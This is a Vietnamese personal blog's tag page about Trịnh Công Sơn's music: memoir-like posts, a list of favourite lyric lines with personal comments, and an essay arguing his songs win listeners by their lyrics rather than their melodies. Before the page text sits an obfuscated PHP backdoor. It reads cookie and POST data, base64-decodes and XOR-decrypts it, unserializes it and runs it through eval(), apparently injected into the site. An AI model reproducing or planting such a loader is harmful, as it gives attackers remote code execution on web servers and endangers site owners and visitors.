$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Trịnh – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: Trịnh

này em đã khóc, chiều mưa đỉnh cao

Mưa Hồng

Ai cũng ghét mệt mỏi. Anh cũng thế. Người ta ghét mệt mỏi, vì nó làm cho người ta uể oải, thiếu sinh khí. Anh ghét mệt mỏi, vì nó làm anh nhớ em.

Anh lết xác về khách sạn, cả người và trí óc đều mệt rã rời, tắm rửa xong là vội quăng ngay người lên tấm nệm to và êm ái. Anh mở máy lên, nghe nhạc, và đôi mắt lướt một cách đầy vô cảm qua dãy nick YM sáng trưng. Bao nhiêu nick online đấy, mấy nick có thể cùng anh chia sẻ mọi thứ?

Em bảo trong em, chẳng còn gì liên quan đến anh. Anh cũng gắng bảo mình thế. Mọi khi anh làm được, nhưng khi mệt mỏi thế này, anh không điều khiển được mình nữa.

Charles trên đường chở anh về có hỏi: “Thành phố nào ở Việt Nam mà mày thích nhất?” Anh hát “này em đã khóc, chiều mưa đỉnh cao” và cười rất bâng quơ…

B.l.u.e.

Tản mạn Trịnh Công Sơn

Trịnh Công Sơn

Tôi còn nhớ, Sài Gòn có một quán cafe rất lạ, nơi nhạc mở chỉ như tiếng muỗi vo ve. Có dịp ngồi nói chuyện với bác chủ quán, thì bác ấy cho biết:

Đó là thú vui khi nghe nhạc. Tình cờ, giai điệu, lời nhạc nào đó thủ thỉ rót vào tai, lại thấy rùng mình vì… ý nghĩa quá. Việc khám phá ra những thứ như vậy, mới hay chú à!

Tôi nghe Trịnh đúng kiểu như thế.

Hôm nay tình cờ tìm thấy một tập tin mà tôi đã tạo từ cách đây rất lâu, ghi lại những câu nhạc Trịnh mà tình cờ lọt vào tai tôi, và tôi thích. Đó không hẳn phải là những câu thật hay. Như đã nói, mọi thứ chỉ xoay quanh hai chữ “cảm xúc”.

Chẹp, xem nào…

***

– giật mình tỉnh ra ồ nắng lên rồi… (Bên Đời Hiu Quạnh)

– nghe trời gió lộng mà thương… (Biển nhớ)
trời ơi, hai chữ “mà thương” làm tôi run rẩy

– em đi bỏ lại con đường, bờ xa cỏ dại, vô thường nhớ em… (Em đi bỏ lại con đường)
rất thích cái ý “vô thường nhớ em”

– mùa xuân quá vội
mười năm tắm gội (Chiếc lá thu phai)

– bước chân nghe quen cũng buồn lạy trời xin còn tuổi xanh… (Chiều một mình qua phố)
hai chữ “lạy trời” nghe buồn quá

– có người lòng như khăn mới thêu… (Có một dòng sông đã qua đời)
vì nó từng là chữ kí của một người tôi rất quý

– những ngày ngồi rủ tóc âm u… (Cỏ xót xa đưa)
tôi ám ảnh câu này, như cách tôi ám ảnh người đàn bà giấu đêm vào trong tóc… – Hồng Thanh Quang

– đời đốt nến chia phôi
dù nhớ thương cũng hoài… (Còn Có Bao Ngày)
lạp chúc thành hôi lệ thuỷ can. Đúng là có nhớ thương thế nào, có đốt cạn tâm can, cũng chỉ hoài công

– tay măng trôi trên vùng tóc dài… (Còn tuổi nào cho em)
nhớ tới Ai nhớ ngàn năm một ngón tay? – Du Tử Lê

– địa đàng còn in dấu chân bước quên… (Dấu Chân Địa Đàng)

– vì em đã mang lời khấn nhỏ
bỏ tôi đứng bên đời kia… (Đêm Thấy Ta Là Thác Đổ)
lần đó là đang ngồi ở cafe sách, đọc ngấu nghiến “Cô đơn trên mạng” – cuốn sách cuối cùng tôi tặng em, thì câu này thình lình ập tới

– ngày sau sỏi đá cũng cần có nhau… (Diễm Xưa)
:-p

– sen buồn một mình
em buồn đền trọn mối tình… (Đoá hoa vô thường)
một trong những bài đảo điên, mê cung dài dằng dặc, hơn chín phút rưỡi. Chỉ một chữ “đền”, đã đủ khiến tôi ngơ ngẩn
em buồn đền trọn mối tình…

– Hà Nội mùa thu tràn nỗi nhớ
không bởi vì em hay vì em
(Đoản khúc thu Hà Nội)

– đàn bò bỗng thấy buồn, bỗng thấy buồn
rồi một hôm đứng mơ mây ngàn
(Du Mục)

– giấc ngủ chưa tròn mẹ bỏ tôi đi
gối lệch chăn mòn mẹ bỏ con đi
(Đường Xa Vạn Dặm – Mẹ Bỏ Con Đi)
cho một thoáng rùng mình. Cảm giác hệt như khi nghe W.A.S.P trong concept album “The Crimson Idol” kinh điển:
Remember me? You can’t save me
Mama you never needed me
No crimson king, look in my eye, you’ll see
Mama I’m lonely, it’s only me, only me

– gia tài của mẹ, một lũ bội tình… (Gia tài của mẹ)
nghe bài này từ những hồi còn rất nhỏ, khi chưa hiểu sự đời. Sau này mỗi khi nghe lại, tuổi càng nhiều, càng thấy sợ.

– trắng lên môi sầu
nghìn đời trông nhau… (Gọi đời lên mau)
tự nhiên nhớ tới bốn từ mùa thu tóc trắng…

– tin buồn từ ngày mẹ cho mang nặng kiếp người… (Gọi Tên Bốn Mùa)

– cho tay em dài
gầy thêm nắng mai
(Hạ trắng)
chỉ thích mỗi chữ “gầy” thôi

– bạn bè rời xa chăn chiếu… (Lời Buồn Thánh)

– đường đời xa lắm nhé
em không nhớ tôi sao?
(Môi hồng đào)

– nay em đã khóc, chiều mưa đỉnh cao… (Mưa hồng)
câu thích nghe nhất trong tất cả các câu nhạc Trịnh. Chỉ đơn giản là tôi nghĩ về một chiều mưa ở Đà Lạt…

– màu nắng hay là màu mắt em… (nắng thuỷ tinh)
một buổi sớm bình thường, khi từ dưới nước ngoi lên, nhìn màu nắng rọi vàng lấp lánh tràn ngập cả bể bơi, tôi thấy mắt mình đỏ hoe…

– đời đã quen với những kiếp xa nhau… (Này em có nhớ)

– trên da thơm, vết máu loang dần (người con gái Việt Nam da vàng)

– chiều tím loang vỉa hè
và gió hôn tóc thề… (Nhìn Những Mùa Thu Đi)

– từ lúc đưa em về
là biết xa nghìn trùng…
(Như Cánh Vạc Bay)
ngày tiễn em ra sân bay, trên con đường về nhà, mưa trắng trời, dường như tôi đã khóc…

– thôi về đi
đường trần đâu có gì
(Phôi Pha)

– ngoài phố mùa Đông
đôi môi em là đốm lửa hồng…
(Ru Đời Đi Nhé)

– bàn tay em năm ngón anh ru ngàn năm… (Ru Em Từng Ngón Xuân Nồng)

– môi nào hãy còn thơm, cho ta phơi cuộc tình… (Ru Ta Ngậm Ngùi)
thích cái cách dùng “phơi cuộc tình”
hôm nay tình cờ thấy clip này trên youtube: http://www.youtube.com/watch?v=LSFwPpIokfw
tôi đã già rồi, mong manh quá, yếu đuối quá, em ơi!

– ru em ngồi yên đấy, tôi tìm cuộc tình cho… (Ru Tình)

– ta thấy em đang ngồi khóc khi rừng chiều đổ mưa… (Rừng Xưa Đã Khép)

– đóa hoa hồng
tàn hôn lên môi
em gầy ngón dài…
(Tuổi đá buồn)

– người em thương mưa ngâu
hay khóc sầu nhân thế
(Ướt mi)

– trả nợ một đời em đã phụ tôi… (Xin Trả Nợ Người)

***

080210
B.l.u.e
.

Tôi nghe Trịnh – những nốt nhạc lạc điệu…

Trịnh Công Sơn

Đợt rồi nhân dịp đưa cho ông anh xem bài “Văn học – Thi ca – Âm nhạc – Từ thời đại đến thời đại – II”, tôi có tranh luận với lão hàng lởm ấy một hồi về việc tôi cho rằng nhạc Trịnh không đến mức xuất sắc để trở thành một hiện tượng quá lớn như hiện đã và đang từng là.

Nay, tôi viết bài này, để giải thích một số quan điểm về cảm nhận của mình.

Tôi nghe Trịnh cũng nhiều, nghe đủ mọi ca sĩ hát, từ những ca sĩ lão làng như Khánh Ly, Lệ Thu, đến các ca sĩ gần đây như Bằng Kiều, Quang Dũng, hay gần hơn nữa là các ca sĩ trẻ Đức Tuấn, Ngọc Hạ; từ những version chất lượng cao cho tới các version được chuyển từ đĩa than (loại đĩa to ơi là to màu đen hồi đó hay xài) và băng cát-xét ra. Tôi nghe Trịnh nhiều nhưng không yêu nhạc Trịnh.

Vì thế, tự cho mình là một người không bị áp đặt bởi ý nghĩ chủ quan của cá nhân, tôi có đôi lời nhận xét về nhạc Trịnh và hiện tượng nhạc Trịnh như sau…

Như trong film Music & Lyrics, có đoạn rất hay sau

A melody is like seeing someone for the first time. The physical attraction. Sex.
But then, as you get to know the person, that’s the lyrics.

Nhạc Trịnh dễ đi vào lòng người không phải bằng nhạc, nhạc của ông đều đều, mang âm hưởng dân ca nhiều, nói chung là không đặc sắc. Các sáng tác của ông không bài nào đạt được nét bi tráng như “Hòn vọng phu” của Lê Thương, nét nhí nhảnh, ngây ngô, đáng yêu như trong “Ngày xưa Hoàng Thị” của Phạm Duy (phổ thơ Phạm Thiên Thư), hay những nốt nhạc thánh thót đến lay động lòng người trong “Trương Chi” của Văn Cao, cũng không có vẻ sầu bi tột độ như các bài Trần Duy Đức phổ thơ Du Tử Lê. Nhạc của ông, nếu tách phần lời đi, thì nghe đều, nhàm, không có sắc thái riêng.

Nhạc Trịnh bước chân vào lòng người nghe nhờ ca từ. Riêng phần này cũng đáng để nói qua, ca từ trong nhạc Trịnh không quá hoa mỹ đến mức gần gũi với các bài Đường Thi như của Văn Cao (gót hài khai hoa, mắt huyền lưu xuân – Cung đàn xưa) hay Thu ca tam tuyệt của Đặng Thế Phong (Trong cây hơi thu cùng heo may – Vi vu qua muôn cành mơ say – Con thuyền không bến). Trái lại, ca từ trong các bài của Trịnh Công Sơn rất bình dân. Nó chẳng là gì cả, chỉ là những điều vụn vặt trong cuộc sống, một tiếng thở dài cho phận người như trong Cát Bụi, một lần nhớ đến Mưa bay ngày nào như trong Diễm xưa… Thế là đủ!

Nói cách khác, như đoạn tôi đã trích dẫn ở trên, nhạc Trịnh cuốn hút người ta bởi sự bình dị một cách chân thành nhất.

Tôi nói dài dòng thế để làm chi? Chỉ để nói một điều rằng: nghe Trịnh thôi là đủ rồi, việc gì phải bày vẽ nghiên cứu Trịnh. Tôi thấy người ta nghe những tác phẩm của Trịnh mà cứ gán cho ông cái mác nào là triết học, nào là nhân tâm, nào là thiền, nào là Phật… mà đôi khi mỉm cười chua chát.

Nói mạnh miệng thì là, may hồi đấy cố nhạc sĩ không nghiên cứu những cái đấy, chứ không thì chưa chắc nhạc của ông đã được yêu thích rộng rãi đến thế.

Điển hình nhạc Trịnh có những bài có phảng phất chất “Thiền” như trong “Một cõi đi về”, nhưng đó không phải là điển hình, và bản thân tác giả cũng từng giải thích ngay bản thân mình cũng khó hiểu. Thế mà thiên hạ nổ ra phong trào nghiên cứu chất “Thiền” và “Đạo” trong nhạc Trịnh. Theo tôi, trong dòng nhạc Việt Nam đương đại, bài mà đi gần tới cảnh giác Thiền nhất là bài “Đưa em đi tìm động hoa vàng” (Phạm Duy, thơ Phạm Thiên Thư), có lẽ bởi vì Phạm Thiên Thư là một nhà tu đích thực…

Thôi, như Bùi Giáng đã nói: Rằng xin các hạ hãy vô ngôn… Cứ một buổi chiều nào đấy, khi ngoài cửa kính là tiếng mưa rơi tí tách, bên li trà nóng thơm mùi nhài rất nhẹ, bạn ngồi mơ màng nhấp từng ngụm trà, văng vẳng bên tai là tiếng rất nhẹ, rất nhẹ như lời thì thầm “mưa vẫn mưa bay trên tầng tháp cổ…” hay “và em đã khóc chiều mưa đỉnh cao”. Tin tôi đi, đến lúc đó, bạn sẽ cảm thấy nhạc Trịnh hoà vào bạn, theo một cách hoàn toàn rất tự nhiên, chứ không phải là qua những cuốn sách dày cộm, hay những bản nghiên cứu đậm chất khoa học đâu.

Và tôi chọn cách nghe Trịnh như một chút gì đó rất bình dị trong cuộc sống. Nghe, chứ không yêu, và không thần tượng…

B.l.u.e.

Cafe sách

Cafe

Anh viết những dòng này khi đang ở cafe sách.

Cafe sách dĩ nhiên là có sách, không những thế mà còn có rất nhiều, và có cafe, cafe không phải thuộc dạng ngon lắm, nhưng ở những nơi như thế này, đối với anh, nó không cần phải đặt lên làm ưu tiên hàng đầu.

Anh nói đùa với bạn Ánh Vân rằng, sẽ thích thú biết mấy nếu con người chả phải làm gì cả, chỉ hằng ngày ngồi uống cafe và đọc sách.

Anh viết những dòng này khi đang ở cafe sách.

Cafe sách ngoài cafe và sách thì còn có nhạc. Khi anh bắt đầu mở trang xanhduong lên và gõ, đó là bài Lời buồn thánh. Còn hiện tại, đang là Đêm thấy ta là thác đổ.

Ở Sài Gòn này có một quán cafe rất đặc biệt. Nhạc ở đó mở nhỏ đến mức không thể tin được, chỉ như những âm thanh rì rào theo cơn gió đưa nhẹ vào tai. Có dịp trò chuyện với người chủ quán, anh chỉ nghe ông ấy nói:

Nghe nhạc khác với thưởng thức nhạc, chú cứ tưởng tượng đột nhiên một câu nào đó, đột nhiên thôi nhé, bay vào tai chú. Dĩ nhiên, trong khoảng thời gian chú ngồi ở đây, sẽ có hàng hà vô số câu mà chú nghe được. Nhưng, sẽ có khoảng khắc, chú cảm nhận, câu đó, nốt đó như được phát ra là chỉ để cho chú nghe…

Tình cờ nghe “vì em đã mang lời khấn nhỏ, để tôi đứng bên đời kia…”, anh lại cảm thấy đúng.

Ồ, lại đổi sang một bài nhạc Trịnh khác nữa rồi.

Anh nghe nhạc Trịnh nhiều, nghe rất nhiều version, từ những bài hát mới thu âm, do các giọng ca mới hát, giọng hát nhẹ nhàng của Đức Tuấn, giọng cao vút của Bằng Kiều… cho đến những tên tuổi gạo cội như Khánh Ly hay Lệ Thu. Anh sưu tầm cả những bài nhạc thu trước năm 1975, những bài nhạc trên đĩa than, chất lượng thua xa các đĩa bây giờ, nghe rè rè nhưng rất thật.

Thế nhưng anh không yêu nhạc Trịnh lắm.

Anh thích nghe nhạc Trịnh, nhưng chỉ ở một vài khoảng khắc nào đó thôi. Đối với anh, nhạc Trịnh đến nhẹ nhàng như thế này là tuyệt vời nhất. Kiểu như tự dưng, những lời ca đó, những nốt nhạc đó và tâm trạng anh hoà vào nhau vậy.

Anh tới đây trong cơn mưa rỉ rả…

Anh ngồi đọc sách trong tiếng nhạc rỉ rả…

Anh ngồi bên li cafe và nhìn ra ngoài bầu trời, cảm nhận bầu trời sau cơn mưa thật tươi đẹp…

Còn lòng anh sau cơn mưa, anh chưa cảm nhận thấy…

Hôm nay anh cầm cuốn sách “Cô đơn trên mạng” lên, chợt se lòng khi nhận ra đó là cuốn sách cuối cùng anh tặng cô ấy.

Sách, cafe, Trịnh, kỉ niệm…

Thế là đã quá đủ cho một buổi chiều yên bình rồi nhỉ…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.